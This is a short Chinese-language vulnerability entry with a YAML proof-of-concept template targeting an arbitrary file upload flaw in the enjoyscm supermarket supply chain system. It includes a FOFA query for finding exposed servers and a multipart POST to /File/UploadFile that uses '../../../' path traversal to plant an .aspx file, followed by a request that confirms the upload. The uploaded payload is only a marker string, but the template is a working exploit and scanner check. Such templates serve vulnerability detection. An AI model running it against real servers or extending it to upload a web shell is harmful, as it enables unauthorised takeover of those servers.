漏洞描述
enjoyscm是国内部分超市使用的一种供应链管理系统。enjoyscm UploadFile参数存在 任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
fofa:title="供应商网上服务厅"
enjoyscm-uploadfile: enjoyscm UploadFile任意文件上传
PoC代码[已公开]
id: enjoyscm-uploadfile
info:
name: enjoyscm UploadFile任意文件上传
author: zan8in
severity: high
verified: true
description: |
enjoyscm是国内部分超市使用的一种供应链管理系统。enjoyscm UploadFile参数存在 任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
fofa:title="供应商网上服务厅"
set:
randstr: randomLowercase(5)
randbody: randomLowercase(28)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /File/UploadFile
headers:
Content-Type: multipart/form-data; boundary=WebKitFormBoundary{{rboundary}}
body: "\
--WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"file\"; filename=\"../../../{{randstr}}.aspx\"\r\n\
Content-Type: image/jpeg\r\n\
\r\n\
hello {{randbody}}\r\n\
--WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"action\"\r\n\
\r\n\
unloadfile\r\n\
--WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"filepath\"\r\n\
\r\n\
\r\n\
--WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: true
r1:
request:
method: GET
path: /{{randstr}}.aspx
expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()